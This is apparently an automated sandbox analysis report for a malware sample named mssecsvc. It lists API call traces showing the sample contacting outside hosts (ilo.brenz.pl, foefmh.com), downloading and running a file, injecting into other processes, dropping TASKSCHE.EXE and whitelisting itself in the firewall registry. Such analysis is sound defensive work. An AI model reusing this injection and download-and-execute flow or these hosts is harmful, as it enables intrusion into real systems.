                                                                                • Opcode Fuzzy Hash: 93ed13287a7bd2140dafd5b4f212b57c54acf0fe28af45ebd9ce4fa85cb1ab7f
                                                                                • Instruction Fuzzy Hash: 65A10071408348BFEB219F348C49BEA7BACEF81304F004659E84A9E091D7F66F05C7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B93ECC Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 265threadlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,00B93EC0), ref: 00B93ECD
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 00B93EE2
                                                                                • wsprintfA.USER32 ref: 00B93EF7
                                                                                • CreateThread.KERNEL32(00000000,00000000,00B93691,00000000,00000000), ref: 00B93F40
                                                                                • CloseHandle.KERNEL32(?,6EF1083C), ref: 00B93F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B93FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00B93FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B93FFF
                                                                                  • Part of subcall function 00B93405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B9344A
                                                                                  • Part of subcall function 00B93405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B93469
                                                                                  • Part of subcall function 00B93405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B93493
                                                                                  • Part of subcall function 00B93405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B934A0
                                                                                  • Part of subcall function 00B93405: UnmapViewOfFile.KERNEL32(?), ref: 00B934B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                                                                                • String ID: C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 541178049-2871364490
                                                                                • Opcode ID: 93ed13287a7bd2140dafd5b4f212b57c54acf0fe28af45ebd9ce4fa85cb1ab7f
                                                                                • Instruction ID: 1083ece6e13a7a8e23546d8e0b8bd45fe0739b409a22a6c9ae18efa0d286fac8
                                                                                • Opcode Fuzzy Hash: 93ed13287a7bd2140dafd5b4f212b57c54acf0fe28af45ebd9ce4fa85cb1ab7f
                                                                                • Instruction Fuzzy Hash: 75A1DF71518258BFEF219F248C5EBEA7BECEF42300F0446A9E8499E082D3F45F468765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA3F60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 215librarystringthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(7FEA3F54), ref: 7FEA3F60
                                                                                  • Part of subcall function 7FEA3F8F: LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
                                                                                  • Part of subcall function 7FEA3F8F: WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
                                                                                  • Part of subcall function 7FEA3F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                  • Part of subcall function 7FEA3F8F: CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                  • Part of subcall function 7FEA3F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                  • Part of subcall function 7FEA3F8F: socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                  • Part of subcall function 7FEA3F8F: connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                  • Part of subcall function 7FEA3F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                                                                                • GetTickCount.KERNEL32 ref: 7FEA41F6
                                                                                Strings
                                                                                • C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe, xrefs: 7FEA4195, 7FEA41DB
                                                                                • C:\WINDOWS\TASKSCHE.EXE, xrefs: 7FEA41DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                • String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE
                                                                                • API String ID: 2996464229-2519926966
                                                                                • Opcode ID: 3a46fe8949218d8fc9384494124be36ff555b877cdb5172203310d60a3e128ac
                                                                                • Instruction ID: 9d7a0edf8395d02bdb3222331a00bfe847c5167623d17b4b3927ccf0a8489e01
                                                                                • Opcode Fuzzy Hash: 3a46fe8949218d8fc9384494124be36ff555b877cdb5172203310d60a3e128ac
                                                                                • Instruction Fuzzy Hash: 5381FE71508388BFEB228F348C59BEA7BADEF41304F040659E84A9E091C7F66F45C762
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B93F60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 215librarystringthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00B93F54), ref: 00B93F60
                                                                                  • Part of subcall function 00B93F8F: LoadLibraryA.KERNEL32(00B93F83), ref: 00B93F8F
                                                                                  • Part of subcall function 00B93F8F: WSAStartup.WS2_32(00000101), ref: 00B93FCE
                                                                                  • Part of subcall function 00B93F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B93FE9
                                                                                  • Part of subcall function 00B93F8F: CloseHandle.KERNEL32(?,00000000), ref: 00B93FF2
                                                                                  • Part of subcall function 00B93F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B93FFF
                                                                                  • Part of subcall function 00B93F8F: socket.WS2_32(00000002,00000001,00000000), ref: 00B94097
                                                                                  • Part of subcall function 00B93F8F: connect.WS2_32(6F6C6902,00B93B09,00000010), ref: 00B940B1
                                                                                  • Part of subcall function 00B93F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 00B940FB
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B94057
                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B94066
                                                                                • wsprintfA.USER32 ref: 00B94179
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B941B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00B96AA2,00000000,00000000), ref: 00B941BD
                                                                                • GetTickCount.KERNEL32 ref: 00B941F6
                                                                                Strings
                                                                                • C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe, xrefs: 00B94195, 00B941DB
                                                                                • C:\WINDOWS\TASKSCHE.EXE, xrefs: 00B941DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                • String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE
                                                                                • API String ID: 2996464229-2519926966
                                                                                • Opcode ID: 3a46fe8949218d8fc9384494124be36ff555b877cdb5172203310d60a3e128ac
                                                                                • Instruction ID: 987ff6dac46bd9fd065c36dfeb2bbbd91a942f1947beaaf49b45af3fc6a0b3e4
                                                                                • Opcode Fuzzy Hash: 3a46fe8949218d8fc9384494124be36ff555b877cdb5172203310d60a3e128ac
                                                                                • Instruction Fuzzy Hash: 0281DF71518258BFEF219F348859BEA7FECEF42300F0446A9E8599E182C3F45F468762
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA388E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127networksleeptimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemTime.KERNEL32(7FEA7584), ref: 7FEA389F
                                                                                • Sleep.KERNEL32(0000EA60), ref: 7FEA3911
                                                                                • InternetGetConnectedState.WININET(?,00000000), ref: 7FEA392A
                                                                                • gethostbyname.WS2_32(0D278125), ref: 7FEA396C
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA3981
                                                                                • ioctlsocket.WS2_32(?,8004667E), ref: 7FEA399A
                                                                                • connect.WS2_32(?,?,00000010), ref: 7FEA39B3
                                                                                • Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 7FEA39C1
                                                                                • closesocket.WS2_32 ref: 7FEA3A20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
                                                                                • String ID: foefmh.com
                                                                                • API String ID: 159131500-183919301
                                                                                • Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                                                                                • Instruction ID: 863d8d36320b09296de0ef8eaaf11b1bc77ac7fb125708de1e92797cd0aa2464
                                                                                • Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                                                                                • Instruction Fuzzy Hash: 4641C531604348BEDB218F208C49BE9BB6EEF85714F004159F90AEE1C1DBF79B409720
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA07AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 7FEA144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                                                                                  • Part of subcall function 7FEA144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                                                                                • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                                                                                • FreeLibrary.KERNEL32(73E60000,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07B8
                                                                                • CloseHandle.KERNEL32(?,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07BF
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
                                                                                • Process32First.KERNEL32 ref: 7FEA07DC
                                                                                • Process32Next.KERNEL32 ref: 7FEA07ED
                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
                                                                                • CloseHandle.KERNEL32 ref: 7FEA086C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                                                                                • String ID: csrs
                                                                                • API String ID: 3908997113-2321902090
                                                                                • Opcode ID: cb63e8b7f3a99e4be573476feab88a83968f02cd0365d5f729e494595204ac2c
                                                                                • Instruction ID: 84bb5cd5c05f80c9023c3546aa49ac891d3b4ee2c4a24ef2c536b510610674c9
                                                                                • Opcode Fuzzy Hash: cb63e8b7f3a99e4be573476feab88a83968f02cd0365d5f729e494595204ac2c
                                                                                • Instruction Fuzzy Hash: 59113D30502205BBEB255F31CD49BBF3A6DEF44711F00016CFE4B9E081DAB69B018AAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA2768 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000104), ref: 7FEA278C
                                                                                  • Part of subcall function 7FEA27A7: GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
                                                                                  • Part of subcall function 7FEA27A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
                                                                                  • Part of subcall function 7FEA27A7: InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
                                                                                  • Part of subcall function 7FEA27A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
                                                                                  • Part of subcall function 7FEA27A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
                                                                                  • Part of subcall function 7FEA27A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
                                                                                  • Part of subcall function 7FEA27A7: InternetCloseHandle.WININET(?), ref: 7FEA2833
                                                                                • InternetCloseHandle.WININET(00000000), ref: 7FEA283A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
                                                                                • String ID:
                                                                                • API String ID: 1995088466-0
                                                                                • Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                • Instruction ID: c1ca02f886126752e6f21441145c1cc666a01a53b77e18b91c733c89828b9d16
                                                                                • Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                • Instruction Fuzzy Hash: A821C0B1145306BFE7215A20CC8AFFF3A6DEF95B10F000119FA4AAD081D7B29B15C6A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B92768 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000104), ref: 00B9278C
                                                                                  • Part of subcall function 00B927A7: GetTempFileNameA.KERNEL32(?,00B927A3,00000000,?), ref: 00B927A8
                                                                                  • Part of subcall function 00B927A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00B927A3,00000000,?), ref: 00B927C3
                                                                                  • Part of subcall function 00B927A7: InternetReadFile.WININET(?,?,00000104), ref: 00B927DD
                                                                                  • Part of subcall function 00B927A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00B927A3,00000000,?), ref: 00B927F3
                                                                                  • Part of subcall function 00B927A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,00B927A3,00000000,?), ref: 00B927FF
                                                                                  • Part of subcall function 00B927A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00B927A3), ref: 00B92823
                                                                                  • Part of subcall function 00B927A7: InternetCloseHandle.WININET(?), ref: 00B92833
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00B9283A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
                                                                                • String ID:
                                                                                • API String ID: 1995088466-0
                                                                                • Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                • Instruction ID: 3c979f55359ea05e8637edfd01210cb8f62386a64cc6d08a36a53dde9f200072
                                                                                • Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                • Instruction Fuzzy Hash: D121FDB1544206BFEB215B20CC8EFFF3A6CEF95B00F000568FA0999082D7B59E0586A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA27A7 Relevance: 12.1, APIs: 8, Instructions: 65filenetworkprocessCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
                                                                                • InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
                                                                                • CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
                                                                                • InternetCloseHandle.WININET(?), ref: 7FEA2833
                                                                                • InternetCloseHandle.WININET(00000000), ref: 7FEA283A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
                                                                                • String ID:
                                                                                • API String ID: 3452404049-0
                                                                                • Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                • Instruction ID: 5e72b063bb693ddb0cec3f1fad15b0eca3dde0b314aeb166be0943229ddb0145
                                                                                • Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                • Instruction Fuzzy Hash: 56116DB1100606BBEB250B20CC4AFFB7A6DEF85B14F004519FA06AD080DBF5AB5196A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA10CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(01FBF7C4), ref: 7FEA113D
                                                                                • GetProcAddress.KERNEL32(00000000,7FEA11D6), ref: 7FEA1148
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: .DLL
                                                                                • API String ID: 1646373207-899428287
                                                                                • Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                • Instruction ID: 2f73ade5318114d7e9bf37e66f68aeb85e6b2a503a621854e5f62f64a3af89c8
                                                                                • Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                • Instruction Fuzzy Hash: D701D634607104EACB538E38C845BFE3B7EFF14275F004115D91A8F159C77A9A508F95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B910CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(01FBF7C4), ref: 00B9113D
                                                                                • GetProcAddress.KERNEL32(00000000,00B911D6), ref: 00B91148
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: .DLL
                                                                                • API String ID: 1646373207-899428287
                                                                                • Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                • Instruction ID: 84791d5e26c0aa329e13559ef3f55e38cf348d4f8042eee9febf51cf543a8531
                                                                                • Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                • Instruction Fuzzy Hash: 0E01DB30607012FACF649E2CC8496A93BECFF05341F0049B4EA1A9B155C7708E40A695
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:4.6%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:330
                                                                                Total number of Limit Nodes:1
                                                                                execution_graph 2537 a83888 2539 a8388e GetSystemTime 2537->2539 2542 a838d2 2539->2542 2540 a8390c Sleep 2540->2542 2541 a83a32 2542->2540 2542->2541 2543 a839b9 Sleep 2542->2543 2543->2542 2489 a8662d 2492 a86647 2489->2492 2493 a86637 2492->2493 2494 a86652 2492->2494 2496 a86658 2494->2496 2499 a82574 2496->2499 2518 a8252f NtOpenSection 2499->2518 2501 a8257c 2502 a82661 2501->2502 2503 a82582 NtMapViewOfSection FindCloseChangeNotification 2501->2503 2502->2493 2503->2502 2506 a825ba 2503->2506 2504 a825ef 2520 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2504->2520 2506->2504 2519 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2506->2519 2507 a82600 2521 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2507->2521 2510 a82611 2522 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2510->2522 2512 a82622 2513 a82637 2512->2513 2523 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2512->2523 2515 a8264c 2513->2515 2524 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2513->2524 2515->2502 2525 a82477 NtProtectVirtualMemory NtWriteVirtualMemory 2515->2525 2518->2501 2519->2504 2520->2507 2521->2510 2522->2512 2523->2513 2524->2515 2525->2502 2562 a8116f LoadLibraryA 2565 a81196 GetProcAddress 2562->2565 2564 a81180 2565->2564 3032 a80fcf 3033 a810a0 3032->3033 3034 a8115c 3033->3034 3035 a81133 GetModuleHandleA GetProcAddress 3033->3035 3035->3033 2526 a86620 2527 a86647 5 API calls 2526->2527 2528 a8662a 2527->2528 2544 a80000 2545 a80004 2544->2545 2546 a800a1 2545->2546 2548 a8025e 2545->2548 2552 a80105 2548->2552 2551 a80278 2551->2546 2553 a80116 GetPEB 2552->2553 2553->2551 2566 a833e0 2567 a8344e 2566->2567 2568 a833e5 2566->2568 2569 a8345f NtQuerySystemInformation 2567->2569 2574 a835f3 2567->2574 2570 a8346f MapViewOfFile CloseHandle 2568->2570 2572 a83440 NtOpenSection 2568->2572 2569->2570 2573 a834b0 2570->2573 2570->2574 2571 a834b7 UnmapViewOfFile 2571->2574 2572->2567 2573->2571 2573->2574 2529 a81422 LookupPrivilegeValueA NtAdjustPrivilegesToken 2575 a82762 2577 a82768 2575->2577 2578 a82829 2577->2578 2579 a82780 GetTempPathA 2577->2579 2585 a827a7 GetTempFileNameA CreateFileA 2579->2585 2582 a827ce 2583 a827fe CloseHandle CreateProcessA 2582->2583 2584 a827ea WriteFile 2582->2584 2583->2578 2584->2582 2584->2583 2586 a827a3 CreateFileA 2585->2586 2587 a827ce 2585->2587 2586->2578 2586->2582 2588 a827fe CloseHandle CreateProcessA 2587->2588 2589 a827ea WriteFile 2587->2589 2588->2586 2589->2587 2589->2588 2590 a82665 2592 a8266b CreateThread CloseHandle 2590->2592 2593 a83c38 2592->2593 2595 a83c3d 2593->2595 2596 a83ca9 2595->2596 2599 a83c5b GetWindowsDirectoryA 2595->2599 2646 a8252f NtOpenSection 2596->2646 2598 a83cae 2601 a83cfb GetSystemDirectoryA 2598->2601 2602 a83cb5 2598->2602 2603 a83d26 2599->2603 2687 a83d1f lstrcat 2601->2687 2647 a83cc2 GetModuleHandleA 2602->2647 2725 a83d36 LoadLibraryA 2603->2725 2646->2598 2648 a83ccc 2647->2648 2649 a83cde 2647->2649 2651 a83cd4 GetProcAddress 2648->2651 2762 a83cf0 GetModuleHandleA 2649->2762 2651->2649 2688 a83d26 2687->2688 2689 a83d36 127 API calls 2688->2689 2690 a83d2b GetProcAddress LoadLibraryA 2689->2690 2692 a810ce 2 API calls 2690->2692 2693 a83d7d 2692->2693 2694 a83d92 GetTickCount 2693->2694 2695 a83daa 2694->2695 2696 a83e47 GetVolumeInformationA 2695->2696 2697 a83e7a 2696->2697 2698 a83f25 2697->2698 2699 a83eb5 84 API calls 2697->2699 2701 a83f4f 2698->2701 2702 a83f31 CreateThread CloseHandle 2698->2702 2700 a83ea9 2699->2700 2700->2698 2704 a83efd 2700->2704 2706 a83eca GetModuleFileNameA 2700->2706 2703 a83f60 43 API calls 2701->2703 2702->2701 2705 a83f54 2703->2705 2704->2698 2708 a83405 5 API calls 2704->2708 2707 a810ce 2 API calls 2705->2707 2706->2704 2709 a83f7e 2707->2709 2708->2698 2710 a83f8f 28 API calls 2709->2710 2711 a83f83 2710->2711 2712 a83ffa CreateEventA 2711->2712 2713 a83fd3 CreateThread CloseHandle 2711->2713 2720 a84012 2712->2720 2713->2712 2714 a84056 lstrlen 2714->2714 2714->2720 2715 a84320 RtlExitUserThread 2716 a842d0 SetEvent 2716->2720 2717 a842f2 Sleep ResetEvent 2717->2720 2718 a840ef GetVersionExA 2718->2720 2719 a84178 11 API calls 2719->2720 2720->2714 2720->2715 2720->2716 2720->2717 2720->2718 2720->2719 2721 a841a7 CreateThread CloseHandle 2720->2721 2722 a841f6 GetTickCount 2720->2722 2723 a84288 Sleep 2720->2723 2721->2720 2722->2720 2723->2720 2724 a84294 GetTickCount 2723->2724 2724->2720 2915 a83d4b GetProcAddress LoadLibraryA 2725->2915 2801 a826d4 2762->2801 2765 a83d1f 149 API calls 2766 a83d12 GetProcAddress LoadLibraryA 2765->2766 2803 a810ce 2766->2803 2769 a83d7d 2770 a83d92 GetTickCount 2769->2770 2771 a83daa 2770->2771 2772 a83e47 GetVolumeInformationA 2771->2772 2773 a83e7a 2772->2773 2774 a83f25 2773->2774 2807 a83eb5 LoadLibraryA 2773->2807 2777 a83f4f 2774->2777 2778 a83f31 CreateThread CloseHandle 2774->2778 2835 a83f60 LoadLibraryA 2777->2835 2778->2777 2802 a826c8 GetSystemDirectoryA 2801->2802 